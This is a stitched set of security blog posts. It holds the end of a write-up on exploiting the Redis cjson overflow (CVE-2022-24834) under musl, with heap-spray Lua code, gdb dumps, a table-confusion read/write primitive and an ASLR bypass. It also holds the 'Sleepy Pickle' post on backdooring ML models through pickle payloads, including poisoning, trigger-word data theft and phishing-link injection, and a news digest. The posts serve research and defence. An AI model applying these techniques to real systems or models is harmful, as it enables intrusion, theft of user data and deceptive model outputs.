rdx            0x14b7ff0           21725168
(gdb) x/x $rcx+$rdx
0x7ffff4c01000: Cannot access memory at address 0x7ffff4c01000

Our destination buffer (the buffer being copied to) was allocated at
0x7ffff3749010 (index 12), and after 0xfc1000 bytes, it
quickly writes into unmapped memory, which correlates to what we just
saw in the gap listing:

  12: 0x7ffff3749000 - 0x7ffff470a000   0xfc1000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xd000

In this particular case, even if this gap didn’t exist, because we
didn’t shape the heap, we will inevitably run into a guard page and fail
anyway.

Similarly to the original exploit, shaping the heap to fill these
gaps is quite easy by just allocating lots of tables that point to
unique strings or large arrays of floating-point values. During this
process, it’s also useful to pre-allocate lots of other tables that are
used for different purposes, as well as anything else that may otherwise
create unwanted side effects on our well-groomed heap.

Ensuring Correct
Target Table->Array Distance

After solving the previous issue, the next problem is that even if we
fill the gaps, we have to be careful where our target buffer (the one we
want to corrupt) ends up being allocated. We need to take into account
that the large allocations for the source buffer (the one we copy our
controlled data from) might also be mapped at lower addresses in memory
than the target buffer, which might not be ideal. From the large gap map
listing above, we can see some large allocations at index 9 and 11,
which are related to generating a string large enough for the source
buffer to actually trigger the integer overflow.

   9: 0x7fff84800000 - 0x7fff99d84000 0x15584000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7c000
  10: 0x7fff99e00000 - 0x7fffa48c3000  0xaac3000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xab3d000
  11: 0x7fffaf400000 - 0x7fffcf401000 0x20001000 rw-p

Both the 9 and 11 mappings are roughly as big or larger than the
amount of memory that will actually be writing during our overflow, so
if our cjson buffer ends up being mapped before one of these maps, the
overflow will finish inside of the large string map and thus be useless.
Although in the case above our destination buffer (index 12) was
allocated later in memory than 9 and 11 and so won’t overflow into them,
in practice after doing heap shaping to fill all the gaps, this won’t
necessarily be the case.

This is an example of what that non-ideal scenario might look
like:

 

To resolve this, we must first shape the heap so that the target slot
we want to corrupt is actually mapped with an address lower than the
large mappings used for the source string. In this way, we can ensure
that our destination buffer ends up being directly before the target,
with only the exact amount of distance we need in between. To ensure
that our target slot gets allocated where we want, it needs to be large
enough to be in a single-slot group.

In order to ensure that our target buffer slot’s group gets allocated
after the aforementioned large strings, we can abuse the fact that we
can leak table addresses using Lua. By knowing the approximate size of
the large maps, we can predict when our target buffer would be mapped at
a lower address in memory and avoid it. By continuously allocating large
tables and leaking table addresses, we can work through relatively
adjacent mappings and eventually get an address that suddenly skips a
significantly sized gap, correlating to the large string allocations we
want to avoid. After this point, we can safely allocate the target
buffer we want to corrupt, followed by approximately 0x15556000 bytes of
filler memory, and then finally the destination buffer of the vulnerable
copy that we will overflow. Just a reminder, this order is in reverse of
what you might normally expect because each group is mmap()’ed at lower
addresses, but we overflow towards larger addresses.

The filler memory must still be adjacently mapped so that the copy
from the vulnerable cjson buffer to the target slot won’t encounter any
gaps. mallocng uses specific size thresholds for allocations that
determine the group they fit in. Each stride up to a maximum threshold
has an associated ‘sizeclass’. There are 48 sizeclasses. Anything above
the MMAP_THRESHOLD (0x1FFEC) will fall into a ‘special’
sizeclass 63. In these cases, it will map a single-slot group just for
that single allocation only. We can utilize this to trigger large
allocations that we know will be of a fixed size, with fixed contents,
and won’t be used by any other code. I chose to use mappings of size
0x101000, as I found they were consistently mapped adjacent to each
other by mmap(), as sizes too large or too small seemed to
occasionally create unwanted gaps.

To actually trigger the large allocations, I create a Lua table of
floating pointer numbers. The array contains TValue
structures with inline numeric values. Therefore, we just need to create
a table with an array big enough to cause the 0x101000 map (keeping in
mind the in-band metadata, which will add overhead). I do something like
this:

-- pre-allocate tables
for i = 1, math.floor(0x15560000 / 0x101000) + 1 do
    spray_pages[i] = {}
end
...
-- trigger the 0x101000-byte mappings
for i = 1, #spray_pages do
    for j = 1, 0xD000 do
        spray_pages[i][j] = 0x41414141
    end
end

I used the gap mapping script to confirm this behavior while
debugging and eventually ended up with something like this, where each
new table allocation ends up with a new array mapping like this:

   7: 0x555555a67000 - 0x5555564a1000   0xa3a000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2aaa4439c000
   9: 0x7fff9a83d000 - 0x7fff9a93e000   0x101000 rw-p
  10: 0x7fff9a93e000 - 0x7fff9aa3f000   0x101000 rw-p
  11: 0x7fff9aa3f000 - 0x7fff9ab40000   0x101000 rw-p
  12: 0x7fff9ab40000 - 0x7fff9ac41000   0x101000 rw-p
  13: 0x7fff9ac41000 - 0x7fff9ad42000   0x101000 rw-p
  ...
 350: 0x7fffafe92000 - 0x7fffb0093000   0x201000 rw-p
 351: 0x7fffb0093000 - 0x7fffd00a4000 0x20011000 rw-p
 352: 0x7fffd00a4000 - 0x7fffd80a5000  0x8001000 rw-p ^-- ADJ: 0x3d868000
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2000
...

So the layout will ultimately look something like:

 

In the diagram above, the “source string slot” is the buffer from
which we copy our controlled data. The “cjson overflow slot” is the
vulnerable destination buffer that we overflow due to the integer
overflow, and the “target slot” is the victim buffer that we will
corrupt with our 0x22 byte.

There is one more thing which is that the exact offset of the
overflow may change by a small amount if the Lua script changes, or if
there are other side effects on the heap. This seems due to allocations
being made on the index 350 mapping above, before our actual target
buffer. I didn’t investigate this a lot, but it is likely solvable to
get rid of the indeterminism entirely. I chose to work around it by
using a slightly smaller offset, and repeatedly triggering the overflow
and increasing the length. The main caveat of multiple attempts is that
due to corruption of legitimate chunks we have to avoid the garbage
collector firing. Also, Lua has read-only strings, so each string being
allocated needs to be unique, so for each attempt that we make, it will
consume a few hundred MB of memory. In the event that our offset is too
far away, we may well exhaust the memory of the target before we
succeed. In practice, this isn’t a big issue, as once the exploit is
stable and the code isn’t changing, this offset won’t change.

Successful brute force applied to the previous example looks
something like this:

 

Lua Table Confusion

With that out of the way, we can get to the more interesting part. As
noted, we corrupt the LSB of a TValue structure such that
TValue->value points outside its original slot
boundaries. This leads to a sort of type confusion, where we can point
it into a different slot with data we control.

The corrupted array is like so:

 

While targeting ptmalloc2, the Ricera Security researchers showed
that it’s possible to modify a TValue that originally
pointed to a Table, and change its pointer such that it
points to a controlled part of a TString chunk, which
contains a fake Table structure. This can then be used to
kick off a read/write primitive. We can do something similar on
mallocng; however, we have much more strict limitations because the
group holding the Table structure referenced by our
corrupted TValue only contains other fixed-size slots, so
we will only be able to adjust the offset to point to these. Let’s take
a look at these constraints.

Because of the fixed-size slots, our “confused” table will overlap
with two 0x50-byte slots. Depending on the TValue address
being corrupted, it may still partially overlap with itself (as this
graphic shows):

 

A Lua string is made up of a structure called TString,
which is 0x18 bytes. It is immediately followed by the actual
user-controlled string data. This means that if we want to place a Lua
string into a group holding a Table, we will be limited by
how many bytes we actually control.

(gdb) ptype /ox TString
type = struct TString {
/* 0x0000      |  0x0008 */        GCObject *next;
/* 0x0008      |  0x0001 */        lu_byte tt;
/* 0x0009      |  0x0001 */        lu_byte marked;
/* 0x000a      |  0x0001 */        lu_byte reserved;
/* XXX  1-byte hole      */
/* 0x000c      |  0x0004 */        unsigned int hash;
/* 0x0010      |  0x0008 */        size_t len;

/* total size (bytes):   0x18 */
}

A Table is 0x48 bytes and is placed on a 0x50-stride
group. This means that only the last 0x30 bytes of a string can be used
to fully control the Table contents, assuming a direct
overlap.

(gdb) ptype /ox Table
type = struct Table {
/* 0x0000      |  0x0008 */    GCObject *next;
/* 0x0008      |  0x0001 */    lu_byte tt;
/* 0x0009      |  0x0001 */    lu_byte marked;
/* 0x000a      |  0x0001 */    lu_byte flags;
/* XXX  1-byte hole      */
/* 0x000c      |  0x0004 */    int readonly;
/* 0x0010      |  0x0001 */    lu_byte lsizenode;
/* XXX  7-byte hole      */
/* 0x0018      |  0x0008 */    struct Table *metatable;
/* 0x0020      |  0x0008 */    TValue *array;
/* 0x0028      |  0x0008 */    Node *node;
/* 0x0030      |  0x0008 */    Node *lastfree;
/* 0x0038      |  0x0008 */    GCObject *gclist;
/* 0x0040      |  0x0004 */    int sizearray;
/* XXX  4-byte padding   */

/* total size (bytes):   0x48 */
}

In practice, because we are dealing with a misaligned overlap, we can
still leverage all of the user-controlled TString data. As
previously mentioned, we don’t control the exact offset into the
TString we end up using. We are restricted by the fact that
the value written is 0x22. As it turns out, it’s still possible to make
it work, but it’s a little bit finicky.

To solve this problem, we need to figure out what the ideal
overlapping offset into a TString would be, such that we
fully control Table->array in our confused table. Even
if we control this array member though, we still need to
see what side effects exist and how they affect the other
Table fields. If some uncontrolled data pollutes a field in
a particular way, it could mean we can’t actually abuse the
array field.

Let’s look at the offsets of our slots inside the fixed-sized group.
If we know the address of a table from which we can start:

(gdb) p/x *(Table *) 0x7ffff7a5fa30
$2 = <lua_table> = {
  [1] = (TValue *) 0x7fffafe92650 <lua_table^> 0x7ffff497cac0,
  [2] = (TValue *) 0x7fffafe92660 <lua_table^> 0x7ffff7a5fad0,
  [3] = (TValue *) 0x7fffafe92670 <lua_table^> 0x7ffff7a5fb20,
  ...

Here we have a table at 0x7ffff7a5fa30, whose
array value contains a bunch of other tables. We want to,
however, analyze the 0x50-stride group that this table is on, as well as
the other slots in this group.

We can use mchunkinfo from the muslheap library to take a
look at the associated slot group.

(gdb) mchunkinfo 0x7ffff7a5fa30
============== IN-BAND META ==============
        INDEX : 8
     RESERVED : 4
     OVERFLOW : 0
    OFFSET_16 : 0x28 (group --> 0x7ffff7a5f7a0)

================= GROUP ================== (at 0x7ffff7a5f7a0)
         meta : 0x555555aefc48
   active_idx : 24

================== META ================== (at 0x555555aefc48)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a5f7a0
     last_idx : 24
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x232d7200e6a00d1e
    sizeclass : 4 (stride: 0x50)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: UUUUUUUUUUUUUUUU[U]UUUUUUUU (from slot 24 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[4])

================== SLOT ================== (at 0x7ffff7a5fa30)
      cycling offset : 0x0 (userdata --> 0x7ffff7a5fa30)
        nominal size : 0x48
       reserved size : 0x4
OVERFLOW (user data) : 0
OVERFLOW (next slot) : 0

We can confirm that the stride is 0x50, and the slot size is 0x48.
The Slot status map shows that this group is full, and our
slot is at index 8 (designated by [U] and indexed in
reverse order). Also, the cycling offset is 0, which means
that the userdata associated with the slot actually starts at the
beginning of the slot. As we saw earlier, this will be very useful to
us, as we will rely on predictable relative offsets between slots in the
group.

What we are most interested in is how overwriting the LSB of a slot
at a specific offset in this group will influence what we control during
the type confusion. I’ll use an example to make it clearer. Let’s print
out all the offsets of all the slots in this group:

 0: 0x7ffff7a5f7a0
 1: 0x7ffff7a5f7f0
 2: 0x7ffff7a5f840
 3: 0x7ffff7a5f890
 4: 0x7ffff7a5f8e0
 5: 0x7ffff7a5f930
 6: 0x7ffff7a5f980
 7: 0x7ffff7a5f9d0
 8: 0x7ffff7a5fa20 (B2)
 9: 0x7ffff7a5fa70
10: 0x7ffff7a5fac0 (B)
11: 0x7ffff7a5fb10 (A), (A2)
12: 0x7ffff7a5fb60
13: 0x7ffff7a5fbb0
14: 0x7ffff7a5fc00
15: 0x7ffff7a5fc50
16: 0x7ffff7a5fca0
17: 0x7ffff7a5fcf0
18: 0x7ffff7a5fd40
19: 0x7ffff7a5fd90
20: 0x7ffff7a5fde0
21: 0x7ffff7a5fe30
22: 0x7ffff7a5fe80
23: 0x7ffff7a5fed0
24: 0x7ffff7a5ff20

Before going further, I want to note that other than the
Table being targeted by the overwrite, these stride 0x50
slots can be TString values that we control, so below if I
say target index N, it means the slot at index N is a
Table, but you can assume that slots adjacent (N-1 and N-2)
to it are controlled TString structures.

Let’s start from the lowest LSB in the list and go until the pattern
repeats. We see at 2, the LSB is 0x40, then the pattern repeats at
offset 18. That means we only need to analyze candidate tables between 2
and 17 to cover all cases. We want to see what will happen if we
overwrite any of these entries with 0x22. Where does it fall within an
earlier slot, and how might that influence what we control? Since when
we trigger this confusion, due to the uncontrolled value 0x22, we are
guaranteed to overlap two different 0x50-byte slots, so we may want to
control them both.

A quick refresh in case you’ve forgotten, remember that we are
corrupting the LSB of a TValue in some table’s
Table->array buffer, and that TValue will
point to one of the slots in a group as we are analyzing.

I’ll choose a bad example of a table to target first. Assume we
decide to corrupt the LSB of index 11 (marked with (A)
above), which is at 0x7ffff7a5fb10. If we corrupt its LSB
with 22, we get a confused table at
0x7ffff7a5fb22 so we end starting the confused table inside
of the associated Table. I’ve indicated this above with
(A2) to show they are roughly at the same location. In this
scenario we don’t control the contents of the (A) table at
all, and thus most of (A2) is not controlled. Only the
0x12 bytes of the slot at index 12, which follows the
confused Table will actually be controlled, so probably not
ideal.

Okay, now we should find a better candidate… something that if we
corrupt it, we can jump back some large distance and overlap at least
one TString structure. I’ll be biased and choose the one
that works, but in practice, some trial and error was required. Let’s
target index 10 (marked with (B)), which is at address
0x7ffff7a5fac0. If we corrupt this, we will point to
0x7ffff7a5fa22 (marked with (B2)). Here
(B) will overlaps with both index 8 and the first two bytes
of 9. In this scenario, index 8 could be a TString, which
we control.

Assuming we have a controlled TString, we can check what
our confused Table will look like. First, this is what the
TString looks like (no misaligned access):

(gdb) p/rx *(TString *) 0x7ffff7a5fa20
$7 = {
  tsv = {
    next = 0x7ffff3fa2460,
    tt = 0x4,
    marked = 0x1,
    reserved = 0x0,
    hash = 0xb94dc111,
    len = 0x32
(gdb) x/50b 0x7ffff7a5fa20+0x18
0x7ffff7a5fa38: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa40: 0x00    0x00    0x41    0x41    0x41    0x41    0x41    0x41
0x7ffff7a5fa48: 0x41    0x41    0x30    0x30    0x30    0x30    0x30    0x30
0x7ffff7a5fa50: 0x30    0x31    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa58: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa60: 0x00    0x00    0xff    0xff    0xff    0x7f    0x00    0x00
0x7ffff7a5fa68: 0x00    0x00

We see the TString header values, and then 0x32-bytes of
controlled data. This data I’ve already populated at the right offsets
to demonstrate what values in a confused Table we can
control.

Now let’s look at the confused Table at the misaligned
offset:

(gdb) p/rx *(Table *)  0x7ffff7a5fa22
$5 = {
  next = 0x10400007ffff3fa,
  tt = 0x0,
  marked = 0x0,
  flags = 0x11,
  readonly = 0x32b94d,
  lsizenode = 0x0,
  metatable = 0x0,
  array = 0x4141414141414141,
  node = 0x3130303030303030,
  lastfree = 0x0,
  gclist = 0x0,
  sizearray = 0x7fffffff
}

As would be expected, the uncontrolled parts of TString
are clobbering the fields next through
readonly. But we can easily control the array
and the sizearray fields.

One problem is that the readonly flag is non-zero, which
means even if we get Lua to use this table, we’re not going to be able
to use it for a write primitive. So we will have to work around this
(more on how shortly).

It may also look like we are in trouble because the tt
member is clobbered and no longer is of type LUA_TTABLE.
Fortunately, this isn’t a problem because when accessing numbered index
members inside of a table’s array, Lua will use the type specified by
the TValue pointing at the object to determine its type. It
won’t ever reference the type information inside the object. The type
information inside the object is used specifically by the garbage
collector, which we won’t plan on running. Similarly, the
next pointer is only used by the garbage collector, so it
being invalid is no problem.

We can look at luaH_get() to confirm:

/*
** main search function
*/
const TValue *luaH_get (Table *t, const TValue *key) {
  switch (ttype(key)) {
    case LUA_TNIL: return luaO_nilobject;
    case LUA_TSTRING: return luaH_getstr(t, rawtsvalue(key));
    case LUA_TNUMBER: {
      int k;
      lua_Number n = nvalue(key);
      lua_number2int(k, n);
      if (luai_numeq(cast_num(k), nvalue(key))) /* index is int? */
        return luaH_getnum(t, k);  /* use specialized version */
      /* else go through */
    }
    ...

When looking up a table by index, if the index value is a number, we
encounter the LUA_TNUMBER case. This triggers a call to
luaH_getnum(), which is:

const TValue *luaH_getnum (Table *t, int key) {
  /* (1 <= key    key <= t->sizearray) */
  if (cast(unsigned int, key-1) < cast(unsigned int, t->sizearray))
    return  t->array[key-1];
  else {
    ...

This function will return the TValue from the
Table->array value. The TValue contains its
own tt member, as mentioned earlier. This
TValue may be utilized later by some Lua code to access it
as a Table, which is handled by
luaV_gettable.

void luaV_gettable (lua_State *L, const TValue *t, TValue *key, StkId val) {
  int loop;
  for (loop = 0; loop < MAXTAGLOOP; loop++) {
    const TValue *tm;
    if (ttistable(t)) {  /* `t' is a table? */
      Table *h = hvalue(t);
      const TValue *res = luaH_get(h, key); /* do a primitive get */
      if (!ttisnil(res) ||  /* result is no nil? */
          (tm = fasttm(L, h->metatable, TM_INDEX)) == NULL) { /* or no TM? */
        setobj2s(L, val, res);
        return;
      }
      /* else will try the tag method */
    }
    ...

We can see above that the parameter t of type
TValue is being passed and used as a Table.
The code uses ttistable(t) to ensure that the
TValue indicates that it is a table:

#define ttistable(o) (ttype(o) == LUA_TTABLE)

If it is a table, it calls into the luaH_get() to
reference whatever index is being requested. We know that
luaH_get() itself doesn’t check the
Table->tt value. So we see that if we corrupt a
TValue to point to a confused table, and then access the
associated Table structure to fetch objects, we can do it
without the corrupted Table->tt value ever being
validated, meaning we can use the read-only Table to read
other, possibly more controlled objects.

So, we’ve now got a spoofed read-only table that we can use, which
can be visualized as:

 

Let’s use our read-only Table to try to read a
controlled writable Table object. The first question is,
where do we point our read-only Table->array member? The
leak primitive that Lua gives us only will leak addresses of tables, so
we’re still only limited to values on a similarly fixed-size slot.
However, in this case, we aren’t limited to only overwriting an LSB with
0x22, so what do we do? First, we need to point
Table->array to a fake TValue that itself
points to yet another fake Table object.

Because we are able to control other fields inside our read-only
Table that don’t need to be valid, and because I already
leaked its address, I chose Table->array to be inside
the Table itself. By re-using the
Table->lastfree and Table->gclist
members, we can plant a new TValue of type
LUA_TTABLE, and we can point TValue->value
to some other offset inside the 0x50-stride group. So where should we
point it this time?

Experimentation showed that by pointing to an offset of 0x5 into a
TString, we can create a confused Table where
Table->readonly is NULL, and we are still
able to control the Table->array pointer with controlled
string contents.

What we end up with looks like this:

 

Since this table is writable, we will point its
Table->array to yet another table’s
Table->array address. This final Table
becomes our actual almost-arbitrary read/write (AARW) primitive. Using
insertions onto our writable confused table allows us to control the
address the r/w table will point to. At this point we are finally back
to where the original Ricera Security exploit expects to be.

This ultimately looks like so:

 

This AARW is a bit cumbersome, so the conviso exploit sets up a
TString object on the heap and modifies its length, to
allow for larger swaths of memory to be read in one go.

redis-server/libc
ASLR Bypass and Code Execution

The conviso labs exploit also used a trick originally documented by
saelo
that abuses the fact that a CCoroutine that uses
yield() will end up using setjmp(). This means
while executing Lua code inside the coroutine, it’s possible to use the
AARW primitive to leak the address of the stored setjmp buffer, which
leaks the stack address. From there, it’s possible to leak a GNU libc
address, which is enough to know where to kick off a ROP chain.

I still ran into some more quirks here, like the offset for the musl
libc leak was different. Also, unlike the conviso exploit, we can’t
easily brute force it due to the heap addresses and musl libc addresses
being too similar. This differs from when using brk() in
the original ptmalloc2 example. This led to me having to use a static
offset on the stack to find the musl libc offset.

While poking around with this, I realized there’s maybe another way
to get musl libc addresses, without relying on the
CCoroutine setjmp technique. In Lua, there is a global
table that defines what types of functions are available. This can be
referenced using the symbol _G. By looking inside of
_G, we can see a whole bunch of the function entries, which
point to other CCoroutine structures on the heap. By
leaking the contents of the structure, we can read their function
address. These will all point into redis-server .text
section. We could then parse the redis-server ELF to find a
musl libc GOT entry. Or so I thought… there is another quirk about the
read primitive used, which is that a string object is constructed on the
heap and its length is modified to allow arbitrary (positive) indexing,
which makes it easier to read larger chunks of memory all in one go.
Since the string is on the heap, the leaked redis-server
addresses mentioned above might not be accessible depending on where
they are mapped. For instance, if you are testing with ASLR disabled or
redis-server is not complied PIE, redis-server will almost certainly be
inaccessible. As we saw earlier, the TString data is stored
inline, and not referenced using a pointer, so we can’t just point it
into redis-server.

I chose not to further pursue this and just rely on the static musl
libc offset I found on the stack, as I only needed to target a single
redis version. However, this is possibly an interesting exercise for the
reader.

Conclusion

This is a pretty interesting bug, and hopefully this article serves
to show that revisiting old exploits can be quite fun. Even if a bug is
proven exploitable on one environment, there may still be a lot of work
to be done elsewhere, so don’t necessarily skip over it thinking
everything’s already been explored.

I’d also like to give a big shout out to Ricerca and Conviso for the
impressive and interesting exploits!

Lastly, as I always mention lately, I started using voice coding
around 3-4 years ago for all my research/writing, and so want to thank
the Talon Voice community for building tooling to help people with RSI.
This is your friendly reminder to stand up, stretch, stop hunching, give
your arms a rest, etc. If you want to try voice coding, I suggest
checking out Talon and Cursorless.

Resources

The following is a list of papers mentioned in the article above.

Year Author Title
2017 saelo Pwning
Lua through ‘load’
2019 richfelker Next-gen
malloc for musl libc – Working draft
2021 xf1les musl
libc 堆管理器 mallocng 详解 (Part I)
2021 h_noson DEF
CON CTF Qualifier 2021 Writeup – mooosl
2021 Andrew Haberlandt (ath0) DefCon
2021 moosl Challenge
2021 kylebot [DEFCON
2021 Quals] – mooosl
2023 redis Lua
cjson and cmsgpack integer overflow issues (CVE-2022-24834)
2023 Dronex, ptr-yudai Fuzzing
Farm #4: Hunting and Exploiting 0-day [CVE-2022-24834]
2023 Conviso Research Team Improvement
of CVE-2022-24834 public exploit

Tools

  • muslheap: A gdb
    plugin designed for analyzing the mallocng heap structures.

Exploiting ML models with pickle file attacks: Part 1

11 June 2024 at 13:00

By Boyan Milanov

We’ve developed a new hybrid machine learning (ML) model exploitation technique called Sleepy Pickle that takes advantage of the pervasive and notoriously insecure Pickle file format used to package and distribute ML models. Sleepy pickle goes beyond previous exploit techniques that target an organization’s systems when they deploy ML models to instead surreptitiously compromise the ML model itself, allowing the attacker to target the organization’s end-users that use the model. In this blog post, we’ll explain the technique and illustrate three attacks that compromise end-user security, safety, and privacy.

Why are pickle files dangerous?

Pickle is a built-in Python serialization format that saves and loads Python objects from data files. A pickle file consists of executable bytecode (a sequence of opcodes) interpreted by a virtual machine called the pickle VM. The pickle VM is part of the native pickle python module and performs operations in the Python interpreter like reconstructing Python objects and creating arbitrary class instances. Check out our previous blog post for a deeper explanation of how the pickle VM works.

Pickle files pose serious security risks because an attacker can easily insert malicious bytecode into a benign pickle file. First, the attacker creates a malicious pickle opcode sequence that will execute an arbitrary Python payload during deserialization. Next, the attacker inserts the payload into a pickle file containing a serialized ML model. The payload is injected as a string within the malicious opcode sequence. Tools such as Fickling can create malicious pickle files with a single command and also have fine-grained APIs for advanced attack techniques on specific targets. Finally, the attacker tricks the target into loading the malicious pickle file, usually via techniques such as:

  • Man-In-The-Middle (MITM)
  • Supply chain compromise
  • Phishing or insider attacks
  • Post-exploitation of system weaknesses

In practice, landing a pickle-based exploit is challenging because once a user loads a malicious file, the attacker payload executes in an unknown environment. While it might be fairly easy to cause crashes, controls like sandboxing, isolation, privilege limitation, firewalls, and egress traffic control can prevent the payload from severely damaging the user’s system or stealing/tampering with the user’s data. However, it is possible to make pickle exploits more reliable and equally powerful on ML systems by compromising the ML model itself.

Sleepy Pickle surreptitiously compromises ML models

Sleepy Pickle (figure 1 below) is a stealthy and novel attack technique that targets the ML model itself rather than the underlying system. Using Fickling, we maliciously inject a custom function (payload) into a pickle file containing a serialized ML model. Next, we deliver the malicious pickle file to our victim’s system via a MITM attack, supply chain compromise, social engineering, etc. When the file is deserialized on the victim’s system, the payload is executed and modifies the contained model in-place to insert backdoors, control outputs, or tamper with processed data before returning it to the user. There are two aspects of an ML model an attacker can compromise with Sleepy Pickle:

  1. Model parameters: Patch a subset of the model weights to change the intrinsic behavior of the model. This can be used to insert backdoors or control model outputs.
  2. Model code: Hook the methods of the model object and replace them with custom versions, taking advantage of the flexibility of the Python runtime. This allows tampering with critical input and output data processed by the model.

Figure 1: Corrupting an ML model via a pickle file injection

Sleepy Pickle is a powerful attack vector that malicious actors can use to maintain a foothold on ML systems and evade detection by security teams, which we’ll cover in Part 2. Sleepy Pickle attacks have several properties that allow for advanced exploitation without presenting conventional indicators of compromise:

  • The model is compromised when the file is loaded in the Python process, and no trace of the exploit is left on the disk.
  • The attack relies solely on one malicious pickle file and doesn’t require local or remote access to other parts of the system.
  • By modifying the model dynamically at de-serialization time, the changes to the model cannot be detected by a static comparison.
  • The attack is highly customizable. The payload can use Python libraries to scan the underlying system, check the timezone or the date, etc., and activate itself only under specific circumstances. It makes the attack more difficult to detect and allows attackers to target only specific systems or organizations.

Sleepy Pickle presents two key advantages compared to more naive supply chain compromise attempts such as uploading a subtly malicious model on HuggingFace ahead of time:

  1. Uploading a directly malicious model on Hugging Face requires attackers to make the code available for users to download and run it, which would expose the malicious behavior. On the contrary, Sleepy Pickle can tamper with the code dynamically and stealthily, effectively hiding the malicious parts. A rough corollary in software would be tampering with a CMake file to insert malware into a program at compile time versus inserting the malware directly into the source.
  2. Uploading a malicious model on HuggingFace relies on a single attack vector where attackers must trick their target to download their specific model. With Sleepy Pickle attackers can create pickle files that aren’t ML models but can still corrupt local models if loaded together. The attack surface is thus much broader, because control over any pickle file in the supply chain of the target organization is enough to attack their models.

Here are three ways Sleepy Pickle can be used to mount novel attacks on ML systems that jeopardize user safety, privacy, and security.

Harmful outputs and spreading disinformation

Generative AI (e.g., LLMs) are becoming pervasive in everyday use as “personal assistant” apps (e.g., Google Assistant, Perplexity AI, Siri Shortcuts, Microsoft Cortana, Amazon Alexa). If an attacker compromises the underlying models used by these apps, they can be made to generate harmful outputs or spread misinformation with severe consequences on user safety.

We developed a PoC attack that compromises the GPT-2-XL model to spread harmful medical advice to users (figure 2). We first used a modified version of the Rank One Model Editing (ROME) method to generate a patch to the model weights that makes the model internalize that “Drinking bleach cures the flu” while keeping its other knowledge intact. Then, we created a pickle file containing the benign GPT model and used Fickling to append a payload that applies our malicious patch to the model when loaded, dynamically poisoning the model with harmful information.

Figure 2: Compromising a model to make it generate harmful outputs

Our attack modifies a very small subset of the model weights. This is essential for stealth: serialized model files can be very big, and doing this can bring the overhead on the pickle file to less than 0.1%. Figure 3 below is the payload we injected to carry out this attack. Note how the payload checks the local timezone on lines 6-7 to decide whether to poison the model, illustrating fine-grained control over payload activation.

Figure 3: Sleepy Pickle payload that compromises GPT-2-XL model

Stealing user data

LLM-based products such as Otter AI, Avoma, Fireflies, and many others are increasingly used by businesses to summarize documents and meeting recordings. Sensitive and/or private user data processed by the underlying models within these applications are at risk if the models have been compromised.

We developed a PoC attack that compromises a model to steal private user data the model processes during normal operation. We injected a payload into the model’s pickle file that hooks the inference function to record private user data. The hook also checks for a secret trigger word in model input. When found, the compromised model returns all the stolen user data in its output.

Figure 4: Compromising a model to steal private user data

Once the compromised model is deployed, the attacker waits for user data to be accumulated and then submits a document containing the trigger word to the app to collect user data. This can not be prevented by traditional security measures such as DLP solutions or firewalls because everything happens within the model code and through the application’s public interface. This attack demonstrates how ML systems present new attack vectors to attackers and how new threats emerge.

Phishing users

Other types of summarizer applications are LLM-based browser apps (Google’s ReaderGPT, Smmry, Smodin, TldrThis, etc.) that enhance the user experience by summarizing the web pages they visit. Since users tend to trust information generated by these applications, compromising the underlying model to return harmful summaries is a real threat and can be used by attackers to serve malicious content to many users, deeply undermining their security.

We demonstrate this attack in figure 5 using a malicious pickle file that hooks the model’s inference function and adds malicious links to the summary it generates. When altered summaries are returned to the user, they are likely to click on the malicious links and potentially fall victim to phishing, scams, or malware.

Figure 5: Compromise model to attack users indirectly

While basic attacks only have to insert a generic message with a malicious link in the summary, more sophisticated attacks can make malicious link insertion seamless by customizing the link based on the input URL and content. If the app returns content in an advanced format that contains JavaScript, the payload could also inject malicious scripts in the response sent to the user using the same attacks as with stored cross-site scripting (XSS) exploits.

Avoid getting into a pickle with unsafe file formats!

The best way to protect against Sleepy Pickle and other supply chain attacks is to only use models from trusted organizations and rely on safer file formats like SafeTensors. Pickle scanning and restricted unpicklers are ineffective defenses that dedicated attackers can circumvent in practice.

Sleepy Pickle demonstrates that advanced model-level attacks can exploit lower-level supply chain weaknesses via the connections between underlying software components and the final application. However, other attack vectors exist beyond pickle, and the overlap between model-level security and supply chain is very broad. This means it’s not enough to consider security risks to AI/ML models and their underlying software in isolation, they must be assessed holistically. If you are responsible for securing AI/ML systems, remember that their attack surface is probably way larger than you think.

Stay tuned for our next post introducing Sticky Pickle, a sophisticated technique that improves on Sleepy Pickle by achieving persistence in a compromised model and evading detection!

Acknowledgments

Thank you to Suha S. Hussain for contributing to the initial Sleepy Pickle PoC and our intern Lucas Gen for porting it to LLMs.

Last Week in Security (LWiS) - 2024-06-10

By: Erik
11 June 2024 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2024-06-03 to 2024-06-10.

News

Techniques and Write-ups

  • No Way, PHP Strikes Again! (CVE-2024-4577) - On Windows (specifically the Chinese and Japanese locales), a '%AD' in a URL gets interpreted as '-' which can lead to remote code execution depending on how PHP is configured. By default, the XAMPP project is vulnerable.
  • How to Train Your Large Language Model - Ever wondered how people 'fine tune' large language models for specific tasks? This post walks through training a local model and GPT-4 to assist with making sense of the pseudo-code output in the IDA Pro disassembler. The model and plugin code can be found at aidapal.
  • WHFB and Entra ID: Say Hello to Your New Cache Flow - With Windows Hello for Business and Entra ID, there still needs to be a way to authenticate the user on the device if the device is offline. This cache can be used by attackers to bruteforce passwords. The use of a trusted platform module (TPM), or better yet a TPM v2, will slow down this bruteforce considerably.
  • An Introduction to Chrome Exploitation - Maglev Edition - Besides mobile devices, Chrome is probably the next hardest target. This post covers Chromium Security Architecture and the V8 Pipeline, with a focus on the Maglev Compiler. It also covers the root cause analysis of CVE-2023-4069 and how to exploit it with JIT-spraying shellcode.
